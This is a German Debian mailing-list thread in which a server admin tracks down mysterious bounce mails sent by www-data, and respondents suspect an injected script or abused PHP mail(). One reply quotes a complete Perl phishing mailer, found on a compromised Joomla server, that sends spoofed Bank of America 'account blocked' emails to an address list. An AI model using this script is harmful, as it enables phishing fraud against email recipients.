Re: Mails vom webserver
Am 2006-08-21 13:47:58, schrieb Jan Albrecht: Ich weiss das die Mails vom Webserver kommen, ich weiss aber nicht warum. Vor allem kommen die Mails in letzter Zeit sehr haeufig. Ich habe auf meinem Webserver kein Mailformular o.ae. installiert. Hast Du php installiert? Du benötigst nämlich nicht unbedingt ein mailformular... Tracen konnte ich auch nichts... Hat vielleicht einer von euch eine Idee wie ich herausfinden koennte woher diese Mails kommen? Sieht nach einem mißglückten SPAM/Relay angriff aus. Sowas habe ich auch öfters, aber ssmtp hat noch nie eine E-Mail versendet... weil eben was fehlt. Danke und Gruss Jan Greetings Michelle Konzack Systemadministrator Tamay Dogan Network Debian GNU/Linux Consultant -- Linux-User #280138 with the Linux Counter, http://counter.li.org/ # Debian GNU/Linux Consultant # Michelle Konzack Apt. 917 ICQ #328449886 50, rue de Soultz MSM LinuxMichi 0033/6/6192519367100 Strasbourg/France IRC #Debian (irc.icq.com) -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Mails vom webserver
Heute (23.08.2006/07:08 Uhr) schrieb Jan Albrecht, So langsam gehen mir echt die Ideen aus. Ich hab zwar das Registration Formular mal abgeschaltet, aber ich glaube nicht das es Besserung bringt. Letztendlich bliebe mir wohl nur den kompletten htdocs Baum nach mail() abzusuchen und jede einzelne Seite zu bearbeiten, oder? und nach folgendem (/tmp nicht vergessen!): --snip |/usr/sbin/sendmail --snap Das ist Teil eines Scripts, dass mal auf einem Server mit Mambo/Joomla abgelegt wurde. ;) --snip #!/usr/bin/perl $SUBJ=Your Account is Blocked $id; $MSG=msgboa.html; $USERS=mails.txt; open(IN,$USERS); $id=1; while(chop($line=IN)){ open(SM,|/usr/sbin/sendmail $line); print(SM From: Bank of America [EMAIL PROTECTED]\n); print(SM To: $line\n); print(SM Subject: $SUBJ - $id\n); print(SM Message-ID: .time().[EMAIL PROTECTED]\n); print([+] $id - Mensaje enviado : $line\n); print(SM Content-Type: text/html\n); open(FILE,$MSG); while($line=FILE){ print(SM $line); } close(FILE); close(SM); $id++; } close(IN); --snap Gruß Jan -- Viele Gruesse, Kind regards, Jim Knuth [EMAIL PROTECTED] ICQ #277289867 -- Zufalls-Zitat -- 1984 begann ein kanadischer Farmer, seine Kühe als Werbeflächen zu vermieten. -- Der Text hat nichts mit dem Empfaenger der Mail zu tun -- Virus free. Checked by NOD32 Version 1.1720 Build 7889 22.08.2006
Re: Mails vom webserver
On 8/22/06, Jim Knuth [EMAIL PROTECTED] wrote: Heute (22.08.2006/00:49 Uhr) schrieb Matthias Haegele, Ich weiss das die Mails vom Webserver kommen etwas falsch ausgedrückt. Sie kommen vom Absender www-data (33) Okay, das stimme. , ich weiss aber nicht warum. Vor allem kommen die Mails in letzter Zeit sehr haeufig. Ich habe auf meinem Webserver kein Mailformular o.ae. installiert. Sicher? Ja, ganz sicher. Ich nutze letztendlich nur 3 Applikationen auf dem Server: - Einen PHP Chat, der aber nur Unmeldemailsverschickt und keine direkt aenderbaren Adressen anbietet. (Ganz davon abgesehen, dass die Mails auch schon vor diesem Chat kamen). - Ein BLOG System (Nucleus CMS) - Gallery Im Hintergrund rennt dann noch ein Webmail, phpmyadmin und awstats, aber die sind von aussen nicht zugaenglich. Interessant ist auch, dass ich teilweise zu besagtem Zeitpunkt keinen Zugriff in den Webserverlogs finden kann, der passend waere. Ich habe mir das ganze praktisch Live angesehen und maximal Zugriffe auf Bilder gefunden. Und wenn es Seiten waren, dann keine, die Mailer enthalten wuerden. Hat vielleicht einer von euch eine Idee wie ich herausfinden koennte woher diese Mails kommen? was sagt denn dein mail.log zum fraglichen Zeitpunkt? (Du kannst einen grep nach der message-id machen ...) Ich packe einfach mal exemplarisch eine Zeile hier rein: Aug 22 02:05:40 salid postfix/pickup[5300]: 54D1032C020: uid=33 from=www-data Aug 22 02:05:40 salid postfix/cleanup[27809]: 54D1032C020: message-id=[EMAIL PROTECTED] Aug 22 02:05:40 salid postfix/cleanup[27809]: 54D1032C020: to=unknown, relay=none, delay=0, status=bounced (No recipients specified) Aug 22 02:05:40 salid postfix/cleanup[27813]: 74B7232C021: message-id=[EMAIL PROTECTED] Aug 22 02:05:40 salid postfix/qmgr[5301]: 74B7232C021: from=, size=1801, nrcpt=1 (queue active) Aug 22 02:05:40 salid postfix/local[27814]: 74B7232C021: to=[EMAIL PROTECTED], orig_to=[EMAIL PROTECTED], relay=local, delay=0, status=sent (delivered to command: /usr/bin/maildrop) Aug 22 02:05:40 salid postfix/qmgr[5301]: 74B7232C021: removed postconf -n? alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases, hash:/var/lib/mailman/data/aliases append_dot_mydomain = no biff = no broken_sasl_auth_clients = yes config_directory = /etc/postfix home_mailbox = Maildir/ inet_interfaces = all mailbox_command = /usr/bin/maildrop mailbox_size_limit = 0 mydestination = $myhostname, localhost.$mydomain mydomain = salid.de myhostname = salid.de mynetworks = 127.0.0.1/8,localhost,salid.de,62.75.155.95 myorigin = /etc/mailname owner_request_special = no recipient_delimiter = + relay_domains = salid.de, mailman.salid.de, www.salid.de, 155095.vserver.de relayhost = smtp_tls_note_starttls_offer = yes smtp_use_tls = yes smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU) smtpd_recipient_restrictions = permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = $myhostname smtpd_sasl_security_options = noanonymous smtpd_tls_CAfile = /etc/postfix/ssl/cacert.pem smtpd_tls_auth_only = no smtpd_tls_cert_file = /etc/postfix/ssl/smtpd.crt smtpd_tls_key_file = /etc/postfix/ssl/smtpd.key smtpd_tls_loglevel = 1 smtpd_tls_received_header = yes smtpd_tls_session_cache_timeout = 3600s smtpd_use_tls = yes tls_random_source = dev:/dev/urandom virtual_alias_maps = hash:/etc/postfix/virtual, hash:/var/lib/mailman/data/virtual-mailman Als Mailer wir postfix eingesetzt (aber das duerfte jetzt ja klar sein ;-) On 8/21/06, Jim Knuth [EMAIL PROTECTED] wrote: wenn es, was anzunehmen ist, über sendmail ausgeliefert wurde, is nix im mail.log Warum ist es anzunehmen? Gruß Jan
Re: Mails vom webserver
Heute (22.08.2006/09:22 Uhr) schrieb Jan Albrecht, Sicher? Ja, ganz sicher. Ich nutze letztendlich nur 3 Applikationen auf dem Server: - Einen PHP Chat, kann es sein - Ein BLOG System (Nucleus CMS) kann es sein - Gallery evtl. möglich Im Hintergrund rennt dann noch ein Webmail, phpmyadmin und awstats, aber die sind von aussen nicht zugaenglich. Interessant ist auch, dass ich teilweise zu besagtem Zeitpunkt keinen Zugriff in den Webserverlogs finden kann, der passend waere. such mal nach einem mails.txt, msg.html. Warum ist es anzunehmen? weil bei sowas (www-data) fast immer die mail() Funktion von PHP benutzt wird. Und das heisst = sendmail (_das_ von postfix) Gruß Jan -- Viele Gruesse, Kind regards, Jim Knuth [EMAIL PROTECTED] ICQ #277289867 -- Zufalls-Zitat -- Niemals in der Welt hört der Haß durch Haß auf, Haß hört durch Liebe auf. -- Der Text hat nichts mit dem Empfaenger der Mail zu tun -- Virus free. Checked by NOD32 Version 1.1718 Build 7878 21.08.2006
Re: Mails vom webserver
On 8/22/06, Jim Knuth [EMAIL PROTECTED] wrote: Heute (22.08.2006/09:22 Uhr) schrieb Jan Albrecht, Sicher? Ja, ganz sicher. Ich nutze letztendlich nur 3 Applikationen auf dem Server: - Einen PHP Chat, kann es sein - Ein BLOG System (Nucleus CMS) kann es sein - Gallery evtl. möglich Im Hintergrund rennt dann noch ein Webmail, phpmyadmin und awstats, aber die sind von aussen nicht zugaenglich. Interessant ist auch, dass ich teilweise zu besagtem Zeitpunkt keinen Zugriff in den Webserverlogs finden kann, der passend waere. such mal nach einem mails.txt, msg.html. Nichts zu finden. Warum ist es anzunehmen? weil bei sowas (www-data) fast immer die mail() Funktion von PHP benutzt wird. Und das heisst = sendmail (_das_ von postfix) Müsste ich, wenn das über den apache reinkommt, das nicht auch im access log sehen? Gruß Jan
Re: Mails vom webserver
Heute (22.08.2006/15:13 Uhr) schrieb Jan Albrecht, such mal nach einem mails.txt, msg.html. Nichts zu finden. Warum ist es anzunehmen? weil bei sowas (www-data) fast immer die mail() Funktion von PHP benutzt wird. Und das heisst = sendmail (_das_ von postfix) Muesste ich, wenn das ueber den apache reinkommt ^ *g* rausgeht , das nicht auch im access log sehen? mmh, da musst du mal greppen. Auf jeden Fall gibt es irgendein Loch, worüber Mails an unknown verschickt werden. Gruß Jan -- Viele Gruesse, Kind regards, Jim Knuth [EMAIL PROTECTED] ICQ #277289867 -- Zufalls-Zitat -- Gedanken springen wie Flöhe von einem zum anderen, aber sie beißen nicht jeden. (George Bernard Shaw, irischer Dramatiker, 1856-1950) -- Der Text hat nichts mit dem Empfaenger der Mail zu tun -- Virus free. Checked by NOD32 Version 1.1718 Build 7878 21.08.2006
Re: Mails vom webserver
On 8/22/06, Jim Knuth [EMAIL PROTECTED] wrote: Heute (22.08.2006/15:13 Uhr) schrieb Jan Albrecht, Muesste ich, wenn das ueber den apache reinkommt ^ *g* rausgeht Ja, klar ;-) Nein, ich meine da müsste doch ein Request über den Apache reinkommen, damit er was verschickt? Oder könnte man auch direkt so einen request absetzen? , das nicht auch im access log sehen? mmh, da musst du mal greppen. Auf jeden Fall gibt es irgendein Loch, worüber Mails an unknown verschickt werden. Ich sehe nur requests auf eine seite, die eigentlich keine direkten Mailfunktionen hat. Da müsste dann schon ein Crawler den send button auslösen... Wobei das ja auch ein Idee wäre. Jan
Re: Mails vom webserver
Jan Albrecht schrieb: On 8/22/06, Jim Knuth [EMAIL PROTECTED] wrote: Heute (22.08.2006/15:13 Uhr) schrieb Jan Albrecht, Muesste ich, wenn das ueber den apache reinkommt ^ *g* rausgeht Ja, klar ;-) Nein, ich meine da müsste doch ein Request über den Apache reinkommen, damit er was verschickt? Oder könnte man auch direkt so einen request absetzen? , das nicht auch im access log sehen? mmh, da musst du mal greppen. Auf jeden Fall gibt es irgendein Loch, worüber Mails an unknown verschickt werden. Ich sehe nur requests auf eine seite, die eigentlich keine direkten Mailfunktionen hat. Da müsste dann schon ein Crawler den send button auslösen... Wobei das ja auch ein Idee wäre. k. A. ob die bots mittlerweile so klug sind, wenn der Button standardmässig so heisst könnte ich mir das schon vorstellen, aber mit dem Webserverzeugs bin ich auch nur Anfänger (nur auf mich bezogen) man liest ja öfters was von missbrauchten php-scripten ... Jan Grüsse MH
Re: Mails vom webserver
Heute (23.08.2006/02:24 Uhr) schrieb Matthias Haegele, k. A. ob die bots mittlerweile so klug sind da kannst du schon manchmal das Grübeln kriegen, was die mittlerweile beherrschen .. , wenn der Button standardmaessig so heisst koennte ich mir das schon vorstellen, aber mit dem Webserverzeugs bin ich auch nur Anfaenger (nur auf mich bezogen) man liest ja oefters was von missbrauchten php-scripten ... das ist das, was ich die ganze Zeit meine. ;) Jan Gruesse MH -- Viele Gruesse, Kind regards, Jim Knuth [EMAIL PROTECTED] ICQ #277289867 -- Zufalls-Zitat -- So mancher, der den Wunsch hat, ewig zu leben, weiss oft nicht, wie er eine kurze Stunde ausfüllen soll. (Upton Sinclair) -- Der Text hat nichts mit dem Empfaenger der Mail zu tun -- Virus free. Checked by NOD32 Version 1.1720 Build 7889 22.08.2006
Re: Mails vom webserver
On 8/23/06, Jim Knuth [EMAIL PROTECTED] wrote: Heute (23.08.2006/02:24 Uhr) schrieb Matthias Haegele, k. A. ob die bots mittlerweile so klug sind da kannst du schon manchmal das Grübeln kriegen, was die mittlerweile beherrschen .. Da wird mir eher schlecht wenn ich daran denke... , wenn der Button standardmaessig so heisst koennte ich mir das schon vorstellen, aber mit dem Webserverzeugs bin ich auch nur Anfaenger (nur auf mich bezogen) man liest ja oefters was von missbrauchten php-scripten ... das ist das, was ich die ganze Zeit meine. ;) Ich hab mich heute morgen nochmal durch die Logs gewühlt. Letztendlich waren zu dem Zeitpunkt (auf Weblogsicht) nur ich und ein Telekom Crawler auf den Webseiten. Und der crawler auf keiner seite, die php_mail() enthält. Ich selbst war auf der seite, die ich gestern vermutet hätte. Aber sonst war nix los. So langsam gehen mir echt die Ideen aus. Ich hab zwar das Registration Formular mal abgeschaltet, aber ich glaube nicht das es Besserung bringt. Letztendlich bliebe mir wohl nur den kompletten htdocs Baum nach mail() abzusuchen und jede einzelne Seite zu bearbeiten, oder? Gruß Jan
Mails vom webserver
Hi zusammen, ich habe da ein seltsames Problem auf meinem vserver: Ich bekomme pro Tag unterschiedlich viele Mails nach diesem Muster: Return-Path: X-Original-To: [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] Received: by salid.de (Postfix) id 20889A92339; Mon, 21 Aug 2006 13:04:03 +0200 (CEST) Date: Mon, 21 Aug 2006 13:04:03 +0200 (CEST) From: [EMAIL PROTECTED] (Mail Delivery System) Subject: Undelivered Mail Returned to Sender To: [EMAIL PROTECTED] MIME-Version: 1.0 Content-Type: multipart/report; report-type=delivery-status; boundary=A4B99A9225F.1156158243/salid.de Message-Id: [EMAIL PROTECTED] An der Mail sind zwei Anhaenge, einer leer und einer nach diesem Muster: Reporting-MTA: dns; salid.de X-Postfix-Queue-ID: A4B99A9225F X-Postfix-Sender: rfc822; [EMAIL PROTECTED] Arrival-Date: Mon, 21 Aug 2006 13:04:01 +0200 (CEST) Final-Recipient: rfc822; unknown Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; No recipients specified Ich weiss das die Mails vom Webserver kommen, ich weiss aber nicht warum. Vor allem kommen die Mails in letzter Zeit sehr haeufig. Ich habe auf meinem Webserver kein Mailformular o.ae. installiert. Tracen konnte ich auch nichts... Hat vielleicht einer von euch eine Idee wie ich herausfinden koennte woher diese Mails kommen? Danke und Gruss Jan -- http://blog.salid.de -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Mails vom webserver
Jan Albrecht schrieb: Hi zusammen, Hallo! ich habe da ein seltsames Problem auf meinem vserver: Ich bekomme pro Tag unterschiedlich viele Mails nach diesem Muster: Return-Path: X-Original-To: [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] Received: by salid.de (Postfix) id 20889A92339; Mon, 21 Aug 2006 13:04:03 +0200 (CEST) Date: Mon, 21 Aug 2006 13:04:03 +0200 (CEST) From: [EMAIL PROTECTED] (Mail Delivery System) Subject: Undelivered Mail Returned to Sender To: [EMAIL PROTECTED] MIME-Version: 1.0 Content-Type: multipart/report; report-type=delivery-status; boundary=A4B99A9225F.1156158243/salid.de Message-Id: [EMAIL PROTECTED] An der Mail sind zwei Anhaenge, einer leer und einer nach diesem Muster: Reporting-MTA: dns; salid.de X-Postfix-Queue-ID: A4B99A9225F X-Postfix-Sender: rfc822; [EMAIL PROTECTED] Arrival-Date: Mon, 21 Aug 2006 13:04:01 +0200 (CEST) Final-Recipient: rfc822; unknown Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; No recipients specified Ich weiss das die Mails vom Webserver kommen, ich weiss aber nicht warum. Vor allem kommen die Mails in letzter Zeit sehr haeufig. Ich habe auf meinem Webserver kein Mailformular o.ae. installiert. Sicher? Tracen konnte ich auch nichts... Hat vielleicht einer von euch eine Idee wie ich herausfinden koennte woher diese Mails kommen? was sagt denn dein mail.log zum fraglichen Zeitpunkt? (Du kannst einen grep nach der message-id machen ...) postconf -n? Danke und Gruss Jan MH -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Mails vom webserver
Heute (21.08.2006/17:34 Uhr) schrieb Matthias Haegele, Jan Albrecht schrieb: Hi zusammen, Hallo! ich habe da ein seltsames Problem auf meinem vserver: Ich bekomme pro Tag unterschiedlich viele Mails nach diesem Muster: Return-Path: X-Original-To: [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] Received: by salid.de (Postfix) id 20889A92339; Mon, 21 Aug 2006 13:04:03 +0200 (CEST) Date: Mon, 21 Aug 2006 13:04:03 +0200 (CEST) From: [EMAIL PROTECTED] (Mail Delivery System) Subject: Undelivered Mail Returned to Sender To: [EMAIL PROTECTED] MIME-Version: 1.0 Content-Type: multipart/report; report-type=delivery-status; boundary=A4B99A9225F.1156158243/salid.de Message-Id: [EMAIL PROTECTED] An der Mail sind zwei Anhaenge, einer leer und einer nach diesem Muster: Reporting-MTA: dns; salid.de X-Postfix-Queue-ID: A4B99A9225F X-Postfix-Sender: rfc822; [EMAIL PROTECTED] Arrival-Date: Mon, 21 Aug 2006 13:04:01 +0200 (CEST) Final-Recipient: rfc822; unknown Action: failed Status: 5.0.0 Diagnostic-Code: X-Postfix; No recipients specified Ich weiss das die Mails vom Webserver kommen, ich weiss aber nicht warum. Vor allem kommen die Mails in letzter Zeit sehr haeufig. Ich habe auf meinem Webserver kein Mailformular o.ae. installiert. Sicher? kann auch über ein eingeschleustes Script (/tmp) passieren Tracen konnte ich auch nichts... Hat vielleicht einer von euch eine Idee wie ich herausfinden koennte woher diese Mails kommen? was sagt denn dein mail.log zum fraglichen Zeitpunkt? (Du kannst einen grep nach der message-id machen ...) wenn es, was anzunehmen ist, über sendmail ausgeliefert wurde, is nix im mail.log postconf -n? siehe oben. Is irrelevant für den Fall Danke und Gruss Jan MH -- Viele Gruesse, Kind regards, Jim Knuth [EMAIL PROTECTED] ICQ #277289867 -- Zufalls-Zitat -- Es stört mich nicht, was meine Minister sagen, solange sie tun, was ich ihnen sage. (Magaret Thatcher, brit. Politikerin) -- Der Text hat nichts mit dem Empfaenger der Mail zu tun -- Virus free. Checked by NOD32 Version 1.1717 Build 7875 21.08.2006
Re: Mails vom webserver
Jim Knuth schrieb: Heute (21.08.2006/17:34 Uhr) schrieb Matthias Haegele, Jan Albrecht schrieb: Hi zusammen, Hallo! ich habe da ein seltsames Problem auf meinem vserver: [...] Ich weiss das die Mails vom Webserver kommen, ich weiss aber nicht warum. Vor allem kommen die Mails in letzter Zeit sehr haeufig. Ich habe auf meinem Webserver kein Mailformular o.ae. installiert. Sicher? kann auch über ein eingeschleustes Script (/tmp) passieren Wie? Apache-Sicherheitsloch (oder was wird als Webserver verwendet), falsch gesetzte Rechte?. Tracen konnte ich auch nichts... Hat vielleicht einer von euch eine Idee wie ich herausfinden koennte woher diese Mails kommen? was sagt denn dein mail.log zum fraglichen Zeitpunkt? (Du kannst einen grep nach der message-id machen ...) wenn es, was anzunehmen ist, über sendmail ausgeliefert wurde, is nix im mail.log Achso. Wusste ich noch nicht, sorry. Und danke Jim. postconf -n? siehe oben. Is irrelevant für den Fall Danke und Gruss Jan Grüsse MH
Re: Mails vom webserver
Heute (22.08.2006/00:49 Uhr) schrieb Matthias Haegele, Ich weiss das die Mails vom Webserver kommen etwas falsch ausgedrückt. Sie kommen vom Absender www-data (33) , ich weiss aber nicht warum. Vor allem kommen die Mails in letzter Zeit sehr haeufig. Ich habe auf meinem Webserver kein Mailformular o.ae. installiert. Sicher? kann auch ueber ein eingeschleustes Script (/tmp) passieren Wie? Apache-Sicherheitsloch (oder was wird als Webserver verwendet), falsch gesetzte Rechte? Nee, nich der Apache. Irgendwelche Sche*** CMS Systeme a la Mambo oder Joomla. Gruesse MH -- Viele Gruesse, Kind regards, Jim Knuth [EMAIL PROTECTED] ICQ #277289867 -- Zufalls-Zitat -- Beliebtheit sollte kein Maßstab für die Wahl von Politikern sein. Wenn es auf die Popularität ankäme, säßen Donald Duck und die Muppets längst im Senat. (Orson Welles) -- Der Text hat nichts mit dem Empfaenger der Mail zu tun -- Virus free. Checked by NOD32 Version 1.1718 Build 7878 21.08.2006